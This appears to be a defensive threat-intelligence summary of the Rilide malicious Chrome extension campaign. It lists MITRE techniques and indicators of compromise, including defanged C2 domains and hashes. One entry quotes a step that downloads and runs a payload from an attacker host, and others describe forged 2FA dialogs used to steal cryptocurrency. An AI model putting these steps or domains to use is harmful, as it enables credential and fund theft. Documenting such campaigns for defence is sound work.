Trustwave SpiderLabs uncovered Rilide, a new malware strain that hijacks Chromium-based browsers by disguising itself as a Google Drive extension and performing a wide range of actions such as monitoring history, taking screenshots, and injecting scripts to steal from cryptocurrency exchanges. The campaign features forged dialogs to fool users into revealing 2FA codes and allows background cryptocurrency withdrawals, with distribution through Ekipa RAT and Aurora Stealer campaigns and ties to a leaked source on an underground forum. #Rilide #EkipaRAT #AuroraStealer #GoogleDriveExtension #Chromium
Keypoints
- Rilide is a malicious Chrome/Chromium extension masquerading as a legitimate Google Drive extension.
- Capable of monitoring browsing history, taking screenshots, and injecting scripts to withdraw funds from cryptocurrency exchanges.
- Uses forged dialogs to deceive users into providing 2FA information, enabling background cryptocurrency withdrawals.
- Distributed via two campaigns: Ekipa RAT (Publisher document) and Aurora Stealer (ads abuse and mimicry of legitimate installers).
- Loader is Rust-based; downloads payloads, installs the extension, and can bypass some CSP protections to load external resources.
- Indicators of compromise include publisher files, Go/Rust loaders, and multiple domain/C2 references, plus wallet addresses.
MITRE Techniques
- [T1105] Ingress Tool Transfer – Download payload from a remote server and execute it. ‘Download payload from hxxps://nch-software[.]info/1/2[.]exe to %temp% directory as.txt’ and ‘Execute the payload.’
- [T1059.001] PowerShell – The loader is executed via a PowerShell process. ‘executed via start-process PowerShell cmdlet’
- [T1036] Masquerading – Rilide Stealer extension mimics benign Google Drive Extensions to blend in. ‘Rilide leverages a Rust loader used to install the extension … mimics benign Google Drive Extensions’
- [T1113] Screen Capture – The malware can capture and exfiltrate screenshots of active tabs on demand. ‘exfiltrates screenshots of the currently active tabs on demand’
- [T1555.003] Credentials from Web Browsers – The attack targets data from browser-stored credentials and wallets for cryptocurrency withdrawals. ‘designed to target data from multiple web browsers, cryptocurrency wallets, and local systems’
- [T1189] Drive-by Compromise – Abuse of Google Ads to spread the Aurora/related loaders. ‘abusing the Google Ads platform to spread the malware’
- [T1566.002] Phishing: Spearphishing Link – Phishing websites used to distribute Aurora and masquerade as legitimate installers. ‘Phishing Websites: Malware Aurora – nvidia-graphics[.]top’
Indicators of Compromise
- [File Name] Tes7777.pub – Context: Publisher file used in Ekipa RAT campaign; Hashes (example): SHA256 0e31ff6406b03982581246b7dd60f3b96edcf0bd007b31766954df001fd68f69, SHA1 e049f56198c23d86e9083142bfe80042e21d4b8e
- [File Name] PackageLauncher.exe – Context: Aurora Stealer payload; Hashes (example): SHA256 e623984143e0dc6e35c79869ab1521c6714e588e8e648606496f8372ca0d8416
- [File Name] 2.exe – Context: Rust-based loader for Rilide; Hash (example): SHA256 0f11aeecbde1f355d26c9d406dad80cb0ae8536aea31fdddaf915d4afd434f3f
- [File Name] waBp.exe – Context: Rilide loader; Hash (example): SHA256 8342b134cddeaf34ce05bafa9e860dacf6cd01b85fd00147d90a350516c055e5
- [Domain] nch-software[.]info – Context: C2 domain used in Ekipa RAT distribution
- [Domain] nvidia-graphics[.]top – Context: Phishing site domain used in Aurora campaign
- [Domain] ashgrrwt[.]click – Context: C2 domain referenced by Rilide loaders
- [Domain] vceilinichego[.]ru – Context: Additional Rilide loader C2 reference
- [Wallet Address] BTC – Context: Cryptocurrency wallets targeted by Rilide; example addresses: bc1qkczacyp5jq29s5kaphth4asu8cv2y4u4gdgj7q, bc1qsjg8dqx6ga30h6szjd8dv2wg50ch50qrey4t7j
- [Wallet Address] ETH – Context: Example Ethereum address used in campaigns; example: 0xDBc1330056E2F5e2FB11FB3C96dE2c44B313eA8d